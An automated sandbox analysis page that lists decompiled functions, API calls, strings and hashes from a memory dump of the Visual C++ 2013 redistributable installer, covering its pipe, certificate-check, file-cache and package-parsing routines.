Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 1214480349-3253666091
Opcode ID: eaf21c73f7ea9f8b34afb1b88c57ce509dfb22f645cae58448c41e6fd54d413c
Instruction ID: 74c3071ff88574d686546e7d1605a2f9ac47e9c2d2bed940b123e50843564f7d
Opcode Fuzzy Hash: eaf21c73f7ea9f8b34afb1b88c57ce509dfb22f645cae58448c41e6fd54d413c
Instruction Fuzzy Hash: 7F519BB1E2120AFFEF11EFA4DC85AEDBBB5FF04754F204069E610A6290D3B5DA409B50

Uniqueness

Uniqueness Score: -1.00%

Function 012AFB2B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E012AFB2B(void* __ebx, void* __edi, void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr* _a12) {
				void* _v8;
				signed int _v12;
				long _v16;
				long _v20;
				union _SID_NAME_USE _v24;
				long _t36;
				void* _t37;
				signed int _t46;
				signed int _t48;
				signed int _t54;
				signed int _t58;
				signed int _t68;

				_v12 = _v12 & 0x00000000;
				_t36 = 0x44;
				_v20 = _t36;
				_v16 = 0xff;
				_t37 = E012B233B(_t36, 1);
				_v8 = _t37;
				if(_t37 != 0) {
					_t68 = E012B00D8( &_v12, _v16);
					__eflags = _t68;
					if(_t68 >= 0) {
						_t46 = LookupAccountNameW(_a4, _a8, _v8,  &_v20, _v12,  &_v16,  &_v24);
						__eflags = _t46;
						if(_t46 != 0) {
							L28:
							_t68 = 0;
							__eflags = 0;
							 *_a12 = _v8;
							_v8 = 0;
						} else {
							_t48 = GetLastError();
							__eflags = _t48 - 0x7a;
							if(_t48 != 0x7a) {
								__eflags = _t48;
								if(__eflags == 0) {
									goto L28;
								} else {
									if(__eflags > 0) {
										_t48 = _t48 & 0x0000ffff | 0x80070000;
										__eflags = _t48;
									}
									_t68 = _t48;
									__eflags = _t68;
									if(_t68 >= 0) {
										_t68 = 0x80004005;
									}
									_push(_t68);
									_push(0x104);
									goto L27;
								}
							} else {
								__eflags = _v20 - 0x44;
								if(_v20 <= 0x44) {
									L13:
									__eflags = _v16 - 0xff;
									if(_v16 <= 0xff) {
										L15:
										_t54 = LookupAccountNameW(_a4, _a8, _v8,  &_v20, _v12,  &_v16,  &_v24);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L28;
										} else {
											_t48 = GetLastError();
											__eflags = _t48;
											if(_t48 > 0) {
												_t48 = _t48 & 0x0000ffff | 0x80070000;
												__eflags = _t48;
											}
											_t68 = _t48;
											__eflags = _t68;
											if(_t68 >= 0) {
												_t68 = 0x80004005;
											}
											_push(_t68);
											_push(0xff);
											goto L27;
										}
									} else {
										_t68 = E012B00D8( &_v12, _v16);
										__eflags = _t68;
										if(_t68 >= 0) {
											goto L15;
										}
									}
								} else {
									_t58 = E012B235D(_v8, _v20, 1);
									__eflags = _t58;
									if(_t58 != 0) {
										_v8 = _t58;
										goto L13;
									} else {
										_t48 = GetLastError();
										__eflags = _t48;
										if(_t48 > 0) {
											_t48 = _t48 & 0x0000ffff | 0x80070000;
											__eflags = _t48;
										}
										_t68 = _t48;
										__eflags = _t68;
										if(_t68 >= 0) {
											_t68 = 0x80004005;
										}
										_push(_t68);
										_push(0xf3);
										L27:
										_push("aclutil.cpp");
										E012B294E(_t48);
									}
								}
							}
						}
					}
				} else {
					_t68 = 0x8007000e;
					E012B294E(_t37, "aclutil.cpp", 0xe3, 0x8007000e);
				}
				if(_v12 != 0) {
					E012B01E8(_v12);
				}
				if(_v8 != 0) {
					E012B24F6(_v8);
				}
				return _t68;
			}

0x012afb31
0x012afb38
0x012afb3c
0x012afb3f
0x012afb46
0x012afb4b
0x012afb50
0x012afb78
0x012afb7a
0x012afb7c
0x012afba2
0x012afba4
0x012afba6
0x012afc86
0x012afc8c
0x012afc8c
0x012afc8e
0x012afc90
0x012afbac
0x012afbb2
0x012afbb4
0x012afbb7
0x012afc59
0x012afc5b
0x00000000
0x012afc5d
0x012afc5d
0x012afc64
0x012afc64
0x012afc64
0x012afc69
0x012afc6b
0x012afc6d
0x012afc6f
0x012afc6f
0x012afc74
0x012afc75
0x00000000
0x012afc75
0x012afbbd
0x012afbbd
0x012afbc1
0x012afbfd
0x012afbfd
0x012afc04
0x012afc18
0x012afc30
0x012afc32
0x012afc34
0x00000000
0x012afc36
0x012afc36
0x012afc38
0x012afc3a
0x012afc41
0x012afc41
0x012afc41
0x012afc46
0x012afc48
0x012afc4a
0x012afc4c
0x012afc4c
0x012afc51
0x012afc52
0x00000000
0x012afc52
0x012afc06
0x012afc12
0x012afc14
0x012afc16
0x00000000
0x00000000
0x012afc16
0x012afbc3
0x012afbcb
0x012afbd0
0x012afbd2
0x012afbfa
0x00000000
0x012afbd4
0x012afbd4
0x012afbd6
0x012afbd8
0x012afbdf
0x012afbdf
0x012afbdf
0x012afbe4
0x012afbe6
0x012afbe8
0x012afbea
0x012afbea
0x012afbef
0x012afbf0
0x012afc7a
0x012afc7a
0x012afc7f
0x012afc7f
0x012afbd2
0x012afbc1
0x012afbb7
0x012afc94
0x012afb52
0x012afb52
0x012afb62
0x012afb62
0x012afc99
0x012afc9e
0x012afc9e
0x012afca7
0x012afcac
0x012afcac
0x012afcb5

APIs

Part of subcall function 012B233B: GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
Part of subcall function 012B233B: RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

LookupAccountNameW.ADVAPI32(00000000,000000FF,?,?,00000000,000000FF,?), ref: 012AFBA2
GetLastError.KERNEL32 ref: 012AFBB2
GetLastError.KERNEL32(?,00000044,00000001), ref: 012AFBD4

Strings

D, xrefs: 012AFBBD
aclutil.cpp, xrefs: 012AFB5D, 012AFC7A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorHeapLast$AccountAllocateLookupNameProcess
String ID: D$aclutil.cpp
API String ID: 1410359055-2185417647
Opcode ID: 7a2c67669331174fbf903cb0fa6a4f3a9744c84216f8c16b7154f5a08c2c1bff
Instruction ID: 8f61fdc85a4c0e2927c175949c6376e3a8d010af47bf16422808c3a137fed464
Opcode Fuzzy Hash: 7a2c67669331174fbf903cb0fa6a4f3a9744c84216f8c16b7154f5a08c2c1bff
Instruction Fuzzy Hash: CF419072C6021BFBDF21DA99CE84BEEBAB9AF04754F500565AE00F6150E379DE049B90

Uniqueness

Uniqueness Score: -1.00%

Function 01298BE8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 112
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E01298BE8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v38;
				struct _WIN32_FIND_DATAW _v600;
				char _v604;
				char _v608;
				WCHAR* _v612;
				signed int _t37;
				int _t50;
				void* _t53;
				void* _t55;
				signed int _t56;
				void* _t59;
				void* _t60;
				void* _t64;
				void* _t65;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				signed int _t71;

				_t65 = __edi;
				_t64 = __edx;
				_t60 = __ecx;
				_t37 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t37 ^ _t71;
				_push(__ebx);
				_push(__esi);
				_t68 = _a8;
				_v604 = 0;
				_v612 = 0;
				_v608 = 0;
				E012A7E30( &_v600, 0, 0x250);
				if(E0129743F(_t60, __edi, _a4, L".unverified",  &_v604) >= 0) {
					_t42 = E012B66A3(_t64, _v604, 7);
				}
				if(_a4 != 0) {
					L15:
					if(_v608 != 0) {
						_t42 = E012B01E8(_v608);
					}
					if(_v612 != 0) {
						_t42 = E012B01E8(_v612);
					}
					_pop(_t69);
					_pop(_t59);
					if(_v604 != 0) {
						_t42 = E012B01E8(_v604);
					}
					return E012A7EAA(_t42, _t59, _v8 ^ _t71, _t64, _t65, _t69);
				} else {
					_t63 = _t68;
					_t42 = E01297654(0, _t68, _t64,  &_v604);
					_t65 = _t65;
					if(_t42 >= 0 && E012B201F(_t63, _t64, _v604, L"*.*",  &_v612) >= 0) {
						_t70 = FindFirstFileW(_v612,  &_v600);
						if(_t70 == 0xffffffff) {
							goto L15;
						} else {
							goto L6;
						}
						do {
							L6:
							if((_v600.dwFileAttributes & 0x00000010) != 0) {
								goto L13;
							}
							_v38 = 0;
							_t50 = lstrlenW( &(_v600.cFileName));
							if(_t50 <= 2) {
								L11:
								_t53 = E012B201F(_t63, _t64, _v604,  &(_v600.cFileName),  &_v608);
								_t84 = _t53;
								if(_t53 >= 0) {
									E012B5BBE(_t63, _t84, _v608);
								}
								goto L13;
							}
							_t55 = _t50 + _t50;
							_t63 = 0x2e;
							if(_t63 !=  *((intOrPtr*)(_t71 + _t55 - 0x22c))) {
								goto L11;
							}
							_t56 =  *(_t71 + _t55 - 0x22a) & 0x0000ffff;
							_t63 = 0x52;
							if(_t63 == _t56) {
								goto L13;
							}
							_t63 = 0x72;
							if(_t63 == _t56) {
								goto L13;
							}
							goto L11;
							L13:
						} while (FindNextFileW(_t70,  &_v600) != 0);
						_t42 = FindClose(_t70);
					}
					goto L15;
				}
			}

0x01298be8
0x01298be8
0x01298be8
0x01298bf1
0x01298bf8
0x01298bfb
0x01298bfc
0x01298bfd
0x01298c0f
0x01298c15
0x01298c1b
0x01298c21
0x01298c3f
0x01298c49
0x01298c49
0x01298c51
0x01298d38
0x01298d3e
0x01298d46
0x01298d46
0x01298d51
0x01298d59
0x01298d59
0x01298d64
0x01298d65
0x01298d66
0x01298d6e
0x01298d6e
0x01298d7e
0x01298c57
0x01298c5e
0x01298c60
0x01298c65
0x01298c68
0x01298ca0
0x01298ca5
0x00000000
0x00000000
0x00000000
0x00000000
0x01298cab
0x01298cab
0x01298cb2
0x00000000
0x00000000
0x01298cb6
0x01298cc1
0x01298cca
0x01298cf3
0x01298d07
0x01298d0c
0x01298d0e
0x01298d16
0x01298d16
0x00000000
0x01298d0e
0x01298cce
0x01298cd0
0x01298cd9
0x00000000
0x00000000
0x01298cdb
0x01298ce5
0x01298ce9
0x00000000
0x00000000
0x01298ced
0x01298cf1
0x00000000
0x00000000
0x00000000
0x01298d1b
0x01298d29
0x01298d32
0x01298d32
0x00000000
0x01298c68

APIs

_memset.LIBCMT ref: 01298C21
FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,.unverified,?,?,?), ref: 01298C9A
lstrlenW.KERNEL32(?,?,?), ref: 01298CC1
FindNextFileW.KERNEL32(00000000,00000010,?,?), ref: 01298D23
FindClose.KERNEL32(00000000,?,?), ref: 01298D32

Part of subcall function 012B66A3: _memset.LIBCMT ref: 012B6718
Part of subcall function 012B66A3: _memset.LIBCMT ref: 012B6726
Part of subcall function 012B66A3: GetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,00000000), ref: 012B672F
Part of subcall function 012B66A3: GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B674A

Strings

*.*, xrefs: 01298C75
.unverified, xrefs: 01298C30

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FileFind_memset$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 2873512992-2528915496
Opcode ID: 16b4325f09ae36fe176487abddfd4f69cd159812074126577595845feb68cf80
Instruction ID: 8e78edefa5c22ee80f4d7c3cfcb8dbae19223c29b8f07090d0699adefb5324a0
Opcode Fuzzy Hash: 16b4325f09ae36fe176487abddfd4f69cd159812074126577595845feb68cf80
Instruction Fuzzy Hash: 8141833192166EAEDF20AF68DC88BEE77B8EF55345F5401EAE608A1050E7709EC48F14

Uniqueness

Uniqueness Score: -1.00%

Function 01298101 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 137encryptionCOMMON

Download Yara Rule

APIs

CryptHashPublicKeyInfo.CRYPT32(00000000,00008004,00000000,00000001,?,?,00000014), ref: 01298170
GetLastError.KERNEL32 ref: 0129820C

Strings

Failed to find expected public key in certificate chain., xrefs: 01298254
Failed to read certificate thumbprint., xrefs: 01298242
cache.cpp, xrefs: 01298231
Failed to get certificate public key identifier., xrefs: 0129823B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CryptErrorHashInfoLastPublic
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
API String ID: 823482589-3408201827
Opcode ID: 8202afe6553652b7fda15005b4f438df825960050bdc216c2463f2e625ccc9c0
Instruction ID: 63d739cff4ca68db4c682e31395aaf683983449a044d9d5c5ea5f9255cd0d7d0
Opcode Fuzzy Hash: 8202afe6553652b7fda15005b4f438df825960050bdc216c2463f2e625ccc9c0
Instruction Fuzzy Hash: 68415C71E2021ADBDF10CF6DD880AAEB7B5FF49720F094559EA14BB290D774A901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 012A7EAA Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E012A7EAA(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x12d40d0; // 0xaab4e29e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x12d5960 = _t6;
				 *0x12d595c = _t22;
				 *0x12d5958 = _t25;
				 *0x12d5954 = _t21;
				 *0x12d5950 = _t27;
				 *0x12d594c = _t26;
				 *0x12d5978 = ss;
				 *0x12d596c = cs;
				 *0x12d5948 = ds;
				 *0x12d5944 = es;
				 *0x12d5940 = fs;
				 *0x12d593c = gs;
				asm("pushfd");
				_pop( *0x12d5970);
				 *0x12d5964 =  *_t31;
				 *0x12d5968 = _v0;
				 *0x12d5974 =  &_a4;
				 *0x12d58b0 = 0x10001;
				_t11 =  *0x12d5968; // 0x0
				 *0x12d5864 = _t11;
				 *0x12d5858 = 0xc0000409;
				 *0x12d585c = 1;
				_t12 =  *0x12d40d0; // 0xaab4e29e
				_v812 = _t12;
				_t13 =  *0x12d40d4; // 0x554b1d61
				_v808 = _t13;
				 *0x12d58a8 = IsDebuggerPresent();
				_push(1);
				E012ACBD2(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x12cf6b8);
				if( *0x12d58a8 == 0) {
					_push(1);
					E012ACBD2(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x012a7eaa
0x012a7eaa
0x012a7eaa
0x012a7eaa
0x012a7eaa
0x012a7eaa
0x012a7eaa
0x012a7eb0
0x012a7eb2
0x012a7eb2
0x012a9e9f
0x012a9ea4
0x012a9eaa
0x012a9eb0
0x012a9eb6
0x012a9ebc
0x012a9ec2
0x012a9ec9
0x012a9ed0
0x012a9ed7
0x012a9ede
0x012a9ee5
0x012a9eec
0x012a9eed
0x012a9ef6
0x012a9efe
0x012a9f06
0x012a9f11
0x012a9f1b
0x012a9f20
0x012a9f25
0x012a9f2f
0x012a9f39
0x012a9f3e
0x012a9f44
0x012a9f49
0x012a9f55
0x012a9f5a
0x012a9f5c
0x012a9f64
0x012a9f6f
0x012a9f7c
0x012a9f7e
0x012a9f80
0x012a9f85
0x012a9f99

APIs

IsDebuggerPresent.KERNEL32 ref: 012A9F4F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 012A9F64
UnhandledExceptionFilter.KERNEL32(012CF6B8), ref: 012A9F6F
GetCurrentProcess.KERNEL32(C0000409), ref: 012A9F8B
TerminateProcess.KERNEL32(00000000), ref: 012A9F92

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 404f9fde9a53ba25e32f2b0e5362e1b6af6084dd822b6d0da4f5d83f5396463c
Instruction ID: 62485b95db64c04d2e30c0ddec015bc56ba03679575eae3a7ffb85fd8129ebfb
Opcode Fuzzy Hash: 404f9fde9a53ba25e32f2b0e5362e1b6af6084dd822b6d0da4f5d83f5396463c
Instruction Fuzzy Hash: BD21D8B4C133849FDB20EF29F08D6983BF0BB4A321F90441AE50897219E3B15889CF89

Uniqueness

Uniqueness Score: -1.00%

Function 012B7D79 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76
timeCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E012B7D79(intOrPtr __ebx, signed int __edx, intOrPtr _a4, struct _SYSTEMTIME* _a8, intOrPtr _a12) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _TIME_ZONE_INFORMATION _v196;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t39;
				intOrPtr _t50;
				intOrPtr _t58;
				signed int _t59;
				intOrPtr _t64;
				struct _SYSTEMTIME* _t65;
				signed int _t66;

				_t62 = __edx;
				_t58 = __ebx;
				_t30 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t30 ^ _t66;
				_t65 = _a8;
				_t64 = _a4;
				if(_a12 == 0) {
					GetTimeZoneInformation( &_v196);
					SystemTimeToTzSpecificLocalTime( &_v196, _t65,  &_v24);
					asm("cdq");
					_t39 = (_v196.Bias ^ _t62) - _t62;
					_t59 = 0x3c;
					_t62 = _t39 % _t59;
					_push(_t39 % _t59);
					_push(_t39 / _t59);
					_push((0 | _v196.Bias > 0x00000000) + (0 | _v196.Bias > 0x00000000) + 0x2b);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					_push(_v24.wHour & 0x0000ffff);
					_push(_v24.wDay & 0x0000ffff);
					_push(_v24.wMonth & 0x0000ffff);
					_t50 = E012B177A(_t64, L"%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u", _v24.wYear & 0x0000ffff);
				} else {
					_push(_t65->wSecond & 0x0000ffff);
					_push(_t65->wMinute & 0x0000ffff);
					_push(_t65->wHour & 0x0000ffff);
					_push(_t65->wDay & 0x0000ffff);
					_push(_t65->wMonth & 0x0000ffff);
					_t50 = E012B177A(_t64, L"%04hu-%02hu-%02huT%02hu:%02hu:%02huZ", _t65->wYear & 0x0000ffff);
				}
				return E012A7EAA(_t50, _t58, _v8 ^ _t66, _t62, _t64, _t65);
			}

0x012b7d79
0x012b7d79
0x012b7d82
0x012b7d89
0x012b7d91
0x012b7d95
0x012b7d98
0x012b7dce
0x012b7de0
0x012b7dec
0x012b7def
0x012b7df3
0x012b7df6
0x012b7df8
0x012b7df9
0x012b7e09
0x012b7e0e
0x012b7e13
0x012b7e18
0x012b7e1d
0x012b7e22
0x012b7e2e
0x012b7d9a
0x012b7d9e
0x012b7da3
0x012b7da8
0x012b7dad
0x012b7db2
0x012b7dbd
0x012b7dc2
0x012b7e43

APIs

GetTimeZoneInformation.KERNEL32(?,012D0B94,?), ref: 012B7DCE
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 012B7DE0

Strings

%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 012B7E28
%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 012B7DB7

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ
API String ID: 1772835396-395410266
Opcode ID: 49184117b8ff5485a8385be16411273a4ac263cf2f4de96ed165aebee3c044b3
Instruction ID: 9dda9b41e7270d159cc00950d36e46373265627cd412e9ab13407e0295421b10
Opcode Fuzzy Hash: 49184117b8ff5485a8385be16411273a4ac263cf2f4de96ed165aebee3c044b3
Instruction Fuzzy Hash: AB2109A2900129FADB24DBA9DC45EBBB3FDAB4C701F00855AB945E2080E7389E90D770

Uniqueness

Uniqueness Score: -1.00%

Function 01298386 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E01298386(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* _t30;

				_push(__ecx);
				_t21 = _a4;
				_v8 = 0;
				if(E01297654(0, _a4, __edx,  &_v8) >= 0) {
					_t30 = E012B65D3(_v8, 0);
					if(_t30 >= 0) {
						__imp__DecryptFileW(_v8, 0);
						if(_a8 != 0) {
							_t30 = E012B1171(_t21, __edx, _a8, _v8, 0);
							if(_t30 < 0) {
								_push("Failed to copy working folder.");
								goto L7;
							}
						}
					} else {
						_push("Failed create working folder.");
						goto L7;
					}
				} else {
					_push("Failed to calculate working folder to ensure it exists.");
					L7:
					_push(_t30);
					E012AFA86();
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t30;
			}

0x01298389
0x0129838a
0x01298395
0x012983a1
0x012983b3
0x012983b7
0x012983c4
0x012983cd
0x012983db
0x012983df
0x012983e1
0x00000000
0x012983e1
0x012983df
0x012983b9
0x012983b9
0x00000000
0x012983b9
0x012983a3
0x012983a3
0x012983e6
0x012983e6
0x012983e7
0x012983ed
0x012983f1
0x012983f6
0x012983f6
0x01298401

Strings

Failed create working folder., xrefs: 012983B9
Failed to copy working folder., xrefs: 012983E1
Failed to calculate working folder to ensure it exists., xrefs: 012983A3

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLastPathTemp_memset
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 623060366-2072961686
Opcode ID: 3e75e5543989a3da34b31f8d8536b3de52bc19b810f48b9342021362c1775da8
Instruction ID: 2bdf508eef1d61000d5f7fa63f976166da198287f53597afadb0962e41747a93
Opcode Fuzzy Hash: 3e75e5543989a3da34b31f8d8536b3de52bc19b810f48b9342021362c1775da8
Instruction Fuzzy Hash: E401F27393812EFFCF11BFAC9CC18EEBAA9AE01695B144179FA0173121D6714E409B84

Uniqueness

Uniqueness Score: -1.00%

Function 01299E4E Relevance: 79.1, APIs: 7, Strings: 38, Instructions: 365
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01299E4E(signed int* _a4, signed int _a8) {
				short* _v8;
				signed int _v12;
				short* _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t90;
				signed int _t92;
				signed int _t94;
				signed int _t106;
				intOrPtr* _t107;
				signed int _t108;
				signed int _t109;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t117;
				signed int _t118;
				int _t126;
				int _t127;
				int _t128;
				int _t129;
				intOrPtr* _t134;
				signed int _t138;
				int _t146;
				int _t147;
				int _t148;
				signed int _t151;
				signed int _t157;
				void* _t160;
				signed int _t162;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t175;
				int _t176;
				int _t177;

				_t149 = _a4;
				_t163 = _a8;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(E012B540B(_a4, L"DetectCondition", _t163 + 0x90) >= 0) {
					_t90 = E012B540B(_t149, L"InstallArguments", _t163 + 0x94);
					__eflags = _t90;
					if(_t90 >= 0) {
						_t92 = E012B540B(_t149, L"UninstallArguments", _t163 + 0x9c);
						__eflags = _t92;
						if(_t92 >= 0) {
							_t94 = E012B540B(_t149, L"RepairArguments", _t163 + 0x98);
							__eflags = _t94;
							if(_t94 >= 0) {
								_t168 = E012B54DD(_t151, _t149, L"Repairable", _t163 + 0xac);
								__eflags = _t168 - 0x80070490;
								if(_t168 == 0x80070490) {
									L11:
									_t169 = E012B540B(_t149, L"Protocol",  &_v8);
									__eflags = _t169;
									if(_t169 < 0) {
										__eflags = _t169 - 0x80070490;
										if(_t169 == 0x80070490) {
											goto L14;
										} else {
											_push("Failed to get @Protocol.");
											goto L76;
										}
									} else {
										_t177 = _t169 | 0xffffffff;
										_t146 = CompareStringW(0x7f, 0, _v8, _t177, L"burn", _t177);
										__eflags = _t146 - 2;
										if(_t146 != 2) {
											_t147 = CompareStringW(0x7f, 0, _v8, _t177, L"netfx4", _t177);
											_t151 = 2;
											__eflags = _t147 - _t151;
											if(_t147 != _t151) {
												_t148 = CompareStringW(0x7f, 0, _v8, _t177, L"none", _t177);
												__eflags = _t148 - 2;
												if(_t148 != 2) {
													goto L70;
												} else {
													 *(_t163 + 0xb0) =  *(_t163 + 0xb0) & 0x00000000;
													goto L14;
												}
											} else {
												 *(_t163 + 0xb0) = _t151;
												goto L14;
											}
										} else {
											 *(_t163 + 0xb0) = 1;
											L14:
											_t170 = E012B54DD(_t151, _a4, L"AsyncInstall", _t163 + 0xb4);
											__eflags = _t170 - 0x80070490;
											if(_t170 == 0x80070490) {
												L23:
												_t171 = E012B54DD(_t151, _a4, L"AsyncRepair", _t163 + 0xb8);
												__eflags = _t171 - 0x80070490;
												if(_t171 == 0x80070490) {
													L26:
